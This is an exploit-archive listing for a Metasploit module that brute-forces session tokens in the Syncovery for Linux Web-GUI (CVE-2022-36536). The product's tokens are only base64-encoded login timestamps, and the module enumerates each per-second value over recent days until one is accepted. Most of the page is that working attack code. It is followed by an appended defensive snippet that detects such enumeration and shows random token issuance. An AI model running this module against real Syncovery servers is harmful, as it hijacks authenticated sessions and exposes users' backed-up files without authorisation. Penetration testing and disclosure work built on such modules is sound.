
Syncovery For Linux Web-GUI Session Token Brute-Forcer
Posted Sep 1, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module attempts to brute-force a valid session token for the Syncovery File Sync and Backup Software Web-GUI by generating every possible token for each second between DateTime.now and the given X day(s) back. By default, today and yesterday (DAYS = 1) are checked. If a valid session token is found, the module stops. The vulnerability exists because Syncovery session tokens are basically just base64(m/d/Y H:M:S) of the login time instead of a random token. If a user does not log out (Syncovery v8.x has no logout), session tokens remain valid until reboot.

tags | exploit, web
advisories | CVE-2022-36536
SHA-256 | 35774315caca7f89f98bfc845f009123bd6450981504bf93e08596306cfc0432

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'base64'
require 'date'
require 'json'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/syncovery_file_sync_backup'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Syncovery For Linux Web-GUI Session Token Brute-Forcer',
        'Description' => %q{
          This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI
          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).
          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.
          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time
          of the login instead of a random token.
          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.
        },
        'Author' => [ 'Jan Rude' ],
        'References' => [
          ['URL', 'https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/'],
          ['CVE', '2022-36536']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => []
        },
        'DisclosureDate' => '2022-09-06',
        'DefaultOptions' => {
          'RPORT' => 8999,
          'STOP_ON_SUCCESS' => true # One valid session is enough
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8999), # Default is HTTP: 8999; HTTPS: 8943
        OptInt.new('DAYS', [true, 'Check today and last X day(s) for valid session token', 1]),
        OptString.new('TARGETURI', [false, 'The path to Syncovery', '/'])
      ]
    )

    deregister_options(
      'USERNAME', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_PASS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING',
      'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2',
      'REMOVE_USERPASS_FILE', 'REMOVE_USER_FILE', 'DOMAIN', 'HttpUsername', 'BLANK_PASSWORDS', 'USER_FILE',
      'USERPASS_FILE', 'PASS_FILE', 'PASSWORD'
    )
  end

  def check_host(_ip)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, '/get_global_variables'),
      'method' => 'GET'
    )

    if res && res.code == 200
      json_res = res.get_json_document
      if json_res['isSyncoveryWindows'] == 'false'
        version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
        if version.empty?
          vprint_warning("#{peer} - Could not identify version")
          Exploit::CheckCode::Detected
        elsif Rex::Version.new(version) < Rex::Version.new('9.48j') || Rex::Version.new(version) == Rex::Version.new('9.48')
          vprint_good("#{peer} - Syncovery #{version}")
          Exploit::CheckCode::Appears
        else
          vprint_status("#{peer} - Syncovery #{version}")
          Exploit::CheckCode::Safe
        end
      else
        Exploit::CheckCode::Safe
      end
    else
      Exploit::CheckCode::Unknown
    end
  end

  def run_host(ip)
    # Calculate dates
    days = datastore['DAYS']
    if days < 0
      days = 0
    end
    dates = []
    (0..days).each do |day|
      dates << (Date.today - day).strftime('%m/%d/%Y')
    end
    time = DateTime.now.strftime('%H:%M:%S')
    hrs, min, sec = time.split(':')

    # Create possible session tokens
    cred_collection = Metasploit::Framework::PrivateCredentialCollection.new
    dates.each do |date|
      (0..hrs.to_i).reverse_each do |hours|
        (0..min.to_i).reverse_each do |minutes|
          (0..sec.to_i).reverse_each do |seconds|
            timestamp = "#{date} #{format('%.2d', hours)}:#{format('%.2d', minutes)}:#{format('%.2d', seconds)}"
            cred_collection.add_private(Base64.strict_encode64(timestamp).strip)
          end
          sec = 59
        end
        min = 59
      end
      hrs = 23
    end

    print_status("#{peer.strip} - Starting Brute-Forcer")
    scanner = Metasploit::Framework::LoginScanner::SyncoveryFileSyncBackup.new(
      configure_login_scanner(
        host: ip,
        port: rport,
        cred_details: cred_collection,
        stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username
        connection_timeout: 10
      )
    )

    scanner.scan! do |result|
      if result.success?
        print_good("#{peer.strip} - VALID TOKEN: #{result.credential.private}")
      else
        vprint_error("#{peer.strip} - INVALID TOKEN: #{result.credential.private}")
      end
    end
  end
end
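
A defender's view of the flaw described above, as an added example that is not part of the Metasploit module or of Syncovery's code: it recognises tokens that decode to an m/d/Y H:M:S timestamp, flags clients that present several distinct ones, and shows random issuance for contrast. The `[client_ip, token]` log layout, the threshold, the function names and the sample addresses are assumptions made for illustration.

```ruby
require 'base64'
require 'securerandom'
require 'time'

# Layout named in the advisory text: base64(m/d/Y H:M:S).
TS_FORMAT = '%m/%d/%Y %H:%M:%S'
TS_SHAPE = %r{\A\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}\z}

# Returns the Time a token encodes, or nil when the token is not
# base64 of a timestamp in that layout (hypothetical helper).
def timestamp_in_token(token)
  decoded = Base64.strict_decode64(token)
  return nil unless decoded.match?(TS_SHAPE)

  Time.strptime(decoded, TS_FORMAT)
rescue ArgumentError # invalid base64 or an impossible date
  nil
end

# Hardened issuance for contrast: 32 bytes from the OS CSPRNG,
# carrying no information about when the login happened.
def new_session_token
  SecureRandom.urlsafe_base64(32)
end

# Flags clients that presented at least `threshold` distinct
# timestamp-shaped tokens, the request pattern that per-second
# enumeration produces. `entries` is an assumed [client_ip, token] list.
def enumeration_suspects(entries, threshold: 3)
  by_client = entries.group_by { |ip, _token| ip }
  by_client.select { |_ip, rows|
    rows.map { |_, token| timestamp_in_token(token) }.compact.uniq.size >= threshold
  }.keys
end

# Constructed sample; addresses are from documentation ranges.
SAMPLE = [
  ['192.0.2.10', Base64.strict_encode64('09/01/2024 10:15:02')],
  ['192.0.2.10', Base64.strict_encode64('09/01/2024 10:15:01')],
  ['192.0.2.10', Base64.strict_encode64('09/01/2024 10:15:00')],
  ['198.51.100.7', Base64.strict_encode64('09/01/2024 08:00:00')],
  ['198.51.100.7', new_session_token]
].freeze

puts enumeration_suspects(SAMPLE).inspect if __FILE__ == $PROGRAM_NAME
```

A single timestamp-shaped token from one client is the product's normal behaviour on affected versions, which is why the check counts distinct values per client rather than alerting on the shape alone.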